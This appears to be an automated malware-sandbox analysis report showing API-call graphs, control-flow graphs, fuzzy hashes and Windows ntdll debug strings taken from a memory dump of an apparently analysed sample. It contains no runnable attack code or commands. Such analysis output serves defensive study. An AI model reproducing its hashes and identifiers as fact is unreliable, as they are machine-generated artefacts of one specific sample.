                                                  execution_graph 67389 1fd9c1d0 589 API calls 67390 1fdcadd0 335 API calls 67391 1fdccdd0 GetPEB GetPEB 67392 1fe219ee GetPEB GetPEB GetPEB 67243 1fdd97d0 332 API calls 67244 1fdd63d0 601 API calls 2 library calls 67395 1fda59c0 778 API calls __swprintf_c_l 67396 1fdc65c0 418 API calls _vswprintf_s 67248 1fe207c3 348 API calls 2 library calls 67250 1fe263c0 336 API calls 67252 1fdccbf0 GetPEB GetPEB GetPEB GetPEB 67253 1fdcc3f0 331 API calls 67404 1fe1d5d0 328 API calls _vswprintf_s 67405 1fe1e1d0 197 API calls __swprintf_c_l 67410 1fd981e6 10 API calls 67260 1fd9a790 412 API calls 67262 1fd9bf80 350 API calls __except_handler4 67263 1fda0780 350 API calls 67267 1fde2380 705 API calls __except_handler4 67416 1fdcf5b0 338 API calls 3 library calls 67421 1fd9c1a0 334 API calls 67269 1fdd33a0 331 API calls __startOneArgErrorHandling 67422 1fdd6da0 332 API calls 67274 1fe26b70 331 API calls 67275 1fe4437c 329 API calls 67279 1fdac770 GetPEB __except_handler4 67280 1fdbd770 9 API calls __startOneArgErrorHandling 67281 1fe22349 585 API calls 3 library calls 67434 1fddb970 369 API calls 67233 1fde2b60 LdrInitializeThunk 67441 1fe28d20 11 API calls 67290 1fdd7b13 706 API calls 67445 1fda2102 204 API calls 67293 1fd9bf00 336 API calls 67294 1fd98300 327 API calls 67446 1fda0100 564 API calls 2 library calls 67447 1fe24d39 331 API calls 2 library calls 67448 1fd9e104 350 API calls 67451 1fe28100 706 API calls __except_handler4 67300 1fd97330 325 API calls _vswprintf_s 67455 1fd9b120 412 API calls 67305 1fda3720 339 API calls __startOneArgErrorHandling 67306 1fdceb20 350 API calls 67308 1fddf320 330 API calls 2 library calls 67459 1fda20da LdrInitializeThunk __except_handler4 67314 1fe27ef0 709 API calls 2 library calls 67462 1fe254f0 553 API calls __except_handler4 67316 1fd9b2c0 345 API calls 67318 1fdceac0 342 API calls 67319 1fdd6ac0 201 API calls 67464 1fe1d0c0 326 API calls __swprintf_c_l 67321 1fd9fef0 11 API calls 67322 1fe21acb 194 API calls __except_handler4 67466 1fd9c0f0 345 API calls 67467 1fda98f0 575 API calls 67468 1fda24f0 598 API calls 67325 1fd9a2e0 535 API calls 3 library calls 67326 1fdcd6e0 690 API calls 2 library calls 67474 1fe1cca0 330 API calls 67475 1fdd909c 347 API calls 2 library calls 67476 1fe26ca0 LdrInitializeThunk LdrInitializeThunk __except_handler4 67330 1fe1daa9 343 API calls 2 library calls 67477 1fd9b890 548 API calls 67332 1fdd3e8f 328 API calls 67334 1fd97a80 346 API calls __except_handler4 67480 1fd9b480 198 API calls 67336 1fdf6282 330 API calls 67483 1fdd4480 349 API calls 67487 1fe2b880 LdrInitializeThunk LdrInitializeThunk GetPEB __except_handler4 67488 1fd978b0 194 API calls 67489 1fda3cb0 16 API calls 67339 1fda1ea0 18 API calls 67340 1fddc6a6 550 API calls 2 library calls 67341 1fdb52a0 372 API calls 3 library calls 67492 1fddbca0 539 API calls 67494 1fe2c89d 9 API calls 2 library calls 67344 1fe1fa60 556 API calls 67496 1fd9645d 552 API calls __startOneArgErrorHandling 67497 1fda2050 348 API calls 67500 1fdcb052 354 API calls 2 library calls 67501 1fe1d070 193 API calls 67502 1fd97440 8 API calls 2 library calls 67351 1fdd7a40 329 API calls 67504 1fe1f87e 328 API calls 67507 1fdd9870 404 API calls 67508 1fe1f450 192 API calls 67359 1fd9826b 351 API calls __startOneArgErrorHandling 67509 1fd9ec6b 589 API calls 67510 1fe26050 325 API calls _vswprintf_s 67361 1fd99660 551 API calls 67511 1fe4705e 567 API calls __except_handler4 67363 1fdd9660 559 API calls __except_handler4 67518 1fe26420 333 API calls 2 library calls 67519 1fe26020 327 API calls 67366 1fd98210 193 API calls 67368 1fdda210 10 API calls 67522 1fe25430 11 API calls _vswprintf_s 67371 1fd9ea0c 590 API calls __except_handler4 67374 1fdd8600 10 API calls 67524 1fddcc00 334 API calls 67237 1fde2c00 67239 1fde2c0a 67237->67239 67240 1fde2c1f LdrInitializeThunk 67239->67240 67241 1fde2c11 67239->67241 67528 1fdd8402 551 API calls 2 library calls 67532 1fddbc3b 329 API calls __except_handler4 67378 1fdaba30 541 API calls 67534 1fdda430 410 API calls _vswprintf_s 67380 1fdd8e2f 353 API calls 67537 1fe21810 551 API calls 67538 1fd9e420 402 API calls __startOneArgErrorHandling 67539 1fd9a020 326 API calls 67540 1fd9c020 12 API calls 67381 1fe1da1d 327 API calls _vswprintf_s 67382 1fdbe627 557 API calls __except_handler4 67385 1fe2321f 376 API calls 2 library calls

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 6 1fde2df0-1fde2dfc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 886400f9e7c8f2ee6db9dcba8dee1039174f8390a9ae573ed44777af9f145cc9
                                                  • Instruction ID: 308d10249466fd830b0eefc332f078984d99bfe98294a1ca89268ee894666f40
                                                  • Opcode Fuzzy Hash: 886400f9e7c8f2ee6db9dcba8dee1039174f8390a9ae573ed44777af9f145cc9
                                                  • Instruction Fuzzy Hash: 6B90023120241413D651B1584505B1B100D87D1241FD6C412B0424628D9756CA63A122
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 5 1fde2c70-1fde2c7c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a57a5285430f3c2977de31d184645420ecaea9739a33f6bf8994a85aa65af4d4
                                                  • Instruction ID: 4e78a3bfe9e1264d6702a35c23acd9843c3eb34f149d6a8184b90c0d9a248d3a
                                                  • Opcode Fuzzy Hash: a57a5285430f3c2977de31d184645420ecaea9739a33f6bf8994a85aa65af4d4
                                                  • Instruction Fuzzy Hash: 6190023120249802D650B1588405B5E100987D1301F9AC411B4424728D8795C9A27122
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 4 1fde2b60-1fde2b6c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: b7401c3ae6c1b9c0a7bd7b8ad5f86939b8c3b83eea121d3038875edb9bc2163f
                                                  • Instruction ID: 8dfe177039280b60060a4274da975f87e2e511ab7adf74a64e9ce82d5586850f
                                                  • Opcode Fuzzy Hash: b7401c3ae6c1b9c0a7bd7b8ad5f86939b8c3b83eea121d3038875edb9bc2163f
                                                  • Instruction Fuzzy Hash: 12900261203410034645B1584415A2A500E87E1201B96C021F1014660DC625C9A26126
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 7 1fde35c0-1fde35cc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 05a597485d397daf3d554de49fc6ff5a13a0fb903a923eaa6d270e2b901d0489
                                                  • Instruction ID: d88da459b8ac866728d6a82b8241a033fe6fbdd18814541df4e39670538db89f
                                                  • Opcode Fuzzy Hash: 05a597485d397daf3d554de49fc6ff5a13a0fb903a923eaa6d270e2b901d0489
                                                  • Instruction Fuzzy Hash: D890023160651402D640B1584515B1A200987D1201FA6C411B0424638D8795CA6265A3
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 1fde2c0a-1fde2c0f 1 1fde2c1f-1fde2c26 LdrInitializeThunk 0->1 2 1fde2c11-1fde2c18 0->2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 26f2f46dbbb8fbc3d90b22f0acbdff79e88ebac8e4eb8882c5f833b61a31c86b
                                                  • Instruction ID: 953b7d2547aea5c2b42e832a4038e26e67ad71ecb1672e193f666fa5850709c7
                                                  • Opcode Fuzzy Hash: 26f2f46dbbb8fbc3d90b22f0acbdff79e88ebac8e4eb8882c5f833b61a31c86b
                                                  • Instruction Fuzzy Hash: 44B09B71D425D5CADB41E7604609B1F791467D1701F56C061E2030751F4738D1D1E176
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 8 1fe58d10-1fe58d27 call 1fdf7e54 GetPEB 11 1fe58d2e 8->11 12 1fe58d29-1fe58d2c 8->12 13 1fe58d33-1fe58d41 GetPEB 11->13 12->13 14 1fe58d57-1fe58d64 13->14 15 1fe58d43-1fe58d51 13->15 17 1fe58f3b-1fe58f5b call 1fe2f290 14->17 18 1fe58d6a-1fe58d70 14->18 15->14 16 1fe59000-1fe59002 15->16 20 1fe59005-1fe5900f 16->20 29 1fe58f62-1fe58f7a call 1fe2f290 17->29 30 1fe58f5d 17->30 21 1fe58ec4-1fe58f0f call 1fe2f290 * 3 18->21 22 1fe58d76-1fe58d7c 18->22 25 1fe59011-1fe5901d call 1fe2a960 20->25 26 1fe5901f-1fe5903a 20->26 73 1fe58f34-1fe58f39 21->73 74 1fe58f11-1fe58f16 21->74 27 1fe58ddd-1fe58de5 22->27 28 1fe58d7e-1fe58d88 22->28 25->26 32 1fe58ebc-1fe58ebf 27->32 33 1fe58deb-1fe58df5 27->33 35 1fe58da3-1fe58dd8 call 1fe2f290 * 3 28->35 36 1fe58d8a-1fe58d9e call 1fe2f290 28->36 54 1fe58f90 29->54 55 1fe58f7c-1fe58f8e call 1fe2f290 29->55 30->29 39 1fe58f9f-1fe58fb8 call 1fe2f290 32->39 42 1fe58df7-1fe58dfb 33->42 43 1fe58e46-1fe58e64 call 1fe2f290 33->43 66 1fe58f95-1fe58f9c call 1fe2f290 35->66 36->39 59 1fe58fcc-1fe58fe4 call 1fe2f290 39->59 60 1fe58fba-1fe58fc9 call 1fe2f290 39->60 42->43 51 1fe58dfd-1fe58e1f call 1fe2f290 42->51 63 1fe58e86 43->63 64 1fe58e66-1fe58e84 call 1fe2f290 * 2 43->64 77 1fe58e21-1fe58e29 51->77 78 1fe58e2b 51->78 54->66 55->39 59->20 92 1fe58fe6-1fe58ffe call 1fe2f290 59->92 60->59 76 1fe58e8b-1fe58e92 call 1fe2f290 63->76 95 1fe58e95-1fe58e9c 64->95 66->39 73->66 87 1fe58f2d-1fe58f32 74->87 88 1fe58f18-1fe58f1d 74->88 76->95 80 1fe58e33-1fe58e3d call 1fe2f290 77->80 81 1fe58e2d-1fe58e2e 78->81 82 1fe58e3f-1fe58e44 78->82 80->95 81->80 82->76 87->66 88->87 94 1fe58f1f-1fe58f24 88->94 92->20 94->39 99 1fe58f26-1fe58f2b 94->99 95->39 99->66
                                                  Strings
                                                  • an invalid address, %p, xrefs: 1FE58F7F
                                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 1FE58E3F
                                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 1FE58E4B
                                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 1FE58DD3
                                                  • *** enter .exr %p for the exception record, xrefs: 1FE58FA1
                                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 1FE58DB5
                                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 1FE58FEF
                                                  • This failed because of error %Ix., xrefs: 1FE58EF6
                                                  • *** An Access Violation occurred in %ws:%s, xrefs: 1FE58F3F
                                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 1FE58DA3
                                                  • The resource is owned exclusively by thread %p, xrefs: 1FE58E24
                                                  • The instruction at %p referenced memory at %p., xrefs: 1FE58EE2
                                                  • The critical section is owned by thread %p., xrefs: 1FE58E69
                                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 1FE58E02
                                                  • *** Inpage error in %ws:%s, xrefs: 1FE58EC8
                                                  • Go determine why that thread has not released the critical section., xrefs: 1FE58E75
                                                  • <unknown>, xrefs: 1FE58D2E, 1FE58D81, 1FE58E00, 1FE58E49, 1FE58EC7, 1FE58F3E
                                                  • *** enter .cxr %p for the context, xrefs: 1FE58FBD
                                                  • write to, xrefs: 1FE58F56
                                                  • a NULL pointer, xrefs: 1FE58F90
                                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 1FE58E86
                                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 1FE58DC4
                                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 1FE58F2D
                                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 1FE58F26
                                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 1FE58F34
                                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 1FE58D8C
                                                  • read from, xrefs: 1FE58F5D, 1FE58F62
                                                  • *** then kb to get the faulting stack, xrefs: 1FE58FCC
                                                  • The resource is owned shared by %d threads, xrefs: 1FE58E2E
                                                  • The instruction at %p tried to %s , xrefs: 1FE58F66
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                  • API String ID: 0-108210295
                                                  • Opcode ID: ef409e5d92744094438913e04b43040ab3648a20738e11f509d4cd85780a998d
                                                  • Instruction ID: db7b3185618cba834ee4f042ba830fc27a6539490a0314c9ba7add913cd56890
                                                  • Opcode Fuzzy Hash: ef409e5d92744094438913e04b43040ab3648a20738e11f509d4cd85780a998d
                                                  • Instruction Fuzzy Hash: 0F81D27EA10214BFCB11DA648C44DBB3B7ABB9BB14F414554F1086F222FB39AA16C761
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 101 1fe5fcab-1fe5fcc3 GetPEB 102 1fe5fcc5-1fe5fce0 GetPEB call 1fd9b970 101->102 103 1fe5fce2-1fe5fce3 call 1fd9b970 101->103 107 1fe5fce8-1fe5fd0a call 1fd9b970 102->107 103->107 110 1fe5fd81-1fe5fd8a GetPEB 107->110 111 1fe5fd0c 107->111 112 1fe5fd8c-1fe5fda7 GetPEB call 1fd9b970 110->112 113 1fe5fda9-1fe5fdaa call 1fd9b970 110->113 114 1fe5fd44-1fe5fd49 111->114 115 1fe5fd67-1fe5fd6c 111->115 116 1fe5fd21-1fe5fd26 111->116 117 1fe5fd60-1fe5fd65 111->117 118 1fe5fd2f-1fe5fd34 111->118 119 1fe5fd6e-1fe5fd73 111->119 120 1fe5fd28-1fe5fd2d 111->120 121 1fe5fd4b-1fe5fd50 111->121 122 1fe5fd75-1fe5fd7a 111->122 123 1fe5fd36-1fe5fd3b 111->123 124 1fe5fd13-1fe5fd18 111->124 125 1fe5fd52-1fe5fd57 111->125 126 1fe5fd3d-1fe5fd42 111->126 127 1fe5fd7c 111->127 128 1fe5fd59-1fe5fd5e 111->128 129 1fe5fd1a-1fe5fd1f 111->129 133 1fe5fdaf-1fe5fdca call 1fd9b970 112->133 113->133 114->110 115->110 116->110 117->110 118->110 119->110 120->110 121->110 122->110 123->110 124->110 125->110 126->110 127->110 128->110 129->110 136 1fe5fe0d-1fe5fe13 133->136 137 1fe5fdcc-1fe5fdd5 GetPEB 133->137 138 1fe5fe15-1fe5fe1e GetPEB 136->138 139 1fe5fe56-1fe5fe5c 136->139 140 1fe5fdf4-1fe5fdf5 call 1fd9b970 137->140 141 1fe5fdd7-1fe5fdf2 GetPEB call 1fd9b970 137->141 142 1fe5fe20-1fe5fe3b GetPEB call 1fd9b970 138->142 143 1fe5fe3d-1fe5fe3e call 1fd9b970 138->143 144 1fe5fe9f-1fe5fea5 139->144 145 1fe5fe5e-1fe5fe67 GetPEB 139->145 155 1fe5fdfa-1fe5fe0c call 1fd9b970 140->155 141->155 157 1fe5fe43-1fe5fe55 call 1fd9b970 142->157 143->157 149 1fe5fea7-1fe5fead 144->149 150 1fe5feaf-1fe5feb8 GetPEB 144->150 153 1fe5fe86-1fe5fe87 call 1fd9b970 145->153 154 1fe5fe69-1fe5fe84 GetPEB call 1fd9b970 145->154 149->150 160 1fe5fef7-1fe5ff00 GetPEB 149->160 161 1fe5fed7-1fe5fed8 call 1fd9b970 150->161 162 1fe5feba-1fe5fed5 GetPEB call 1fd9b970 150->162 167 1fe5fe8c-1fe5fe9e call 1fd9b970 153->167 154->167 155->136 157->139 165 1fe5ff02-1fe5ff1d GetPEB call 1fd9b970 160->165 166 1fe5ff1f-1fe5ff20 call 1fd9b970 160->166 177 1fe5fedd-1fe5fef4 call 1fd9b970 161->177 162->177 180 1fe5ff25-1fe5ff3a call 1fd9b970 165->180 166->180 167->144 177->160
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                  • API String ID: 0-2897834094
                                                  • Opcode ID: 51e6c74f8bb536f0a4ee7a844379009307579a9ed7746c34e77d375f1eb0150d
                                                  • Instruction ID: 79c58523cee1f26b93fd4fc46cc3250f94055ff757c59fd5f40906e7603106d6
                                                  • Opcode Fuzzy Hash: 51e6c74f8bb536f0a4ee7a844379009307579a9ed7746c34e77d375f1eb0150d
                                                  • Instruction Fuzzy Hash: 4B61CC7A4222D0EFC7819BD4D8C4F7173E8F746B3474A8156E8004F7B2DA35AD458BA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                  • API String ID: 0-2515994595
                                                  • Opcode ID: 1633940f860de6c58559c952c1ba01daa41b7e0171aaf59a2b7fe491938c903b
                                                  • Instruction ID: c3eadd81b6c3ba0e250164ce6990e290f29027b159bbeebe1f6c23612a41bf69
                                                  • Opcode Fuzzy Hash: 1633940f860de6c58559c952c1ba01daa41b7e0171aaf59a2b7fe491938c903b
                                                  • Instruction Fuzzy Hash: D451C0715153519BC325CF14E840BABBBECFF84358F654A1EE899C7280E771E608C7A2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                  • API String ID: 0-3197712848
                                                  • Opcode ID: 78766b73cacf1aa5494d7f428eac95595d7dc31be3c34018cbceb8029b351390
                                                  • Instruction ID: 1701c82d5ad7a85dbc404bf2cfda98e86dd34311fe5d21b240c247fa863f8fb1
                                                  • Opcode Fuzzy Hash: 78766b73cacf1aa5494d7f428eac95595d7dc31be3c34018cbceb8029b351390
                                                  • Instruction Fuzzy Hash: 9612D575A093528BD3A4DF24C880BBA77E5FF86715F04061EF8C68B290E735E944CB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                  • API String ID: 0-1357697941
                                                  • Opcode ID: 7ba08ccbdee3a8bdedcb3057f2d81d38c8b85f3eb611ff5f1fd5789ca4f542f4
                                                  • Instruction ID: 93b9613edaa6e90536429c551f7553f98de73ef30dcf345d01f406da30e43f29
                                                  • Opcode Fuzzy Hash: 7ba08ccbdee3a8bdedcb3057f2d81d38c8b85f3eb611ff5f1fd5789ca4f542f4
                                                  • Instruction Fuzzy Hash: 39F1F339914286EFCB11CF64C880BEABBF5FF09308F458059E5859B2A1D734F949CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • RtlpProbeAssemblyStorageRootForAssembly, xrefs: 1FE129AC
                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 1FE1292E
                                                  • @, xrefs: 1FDD3180
                                                  • SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 1FE12856
                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 1FE128B2
                                                  • SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 1FE12881
                                                  • SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 1FE129B1
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
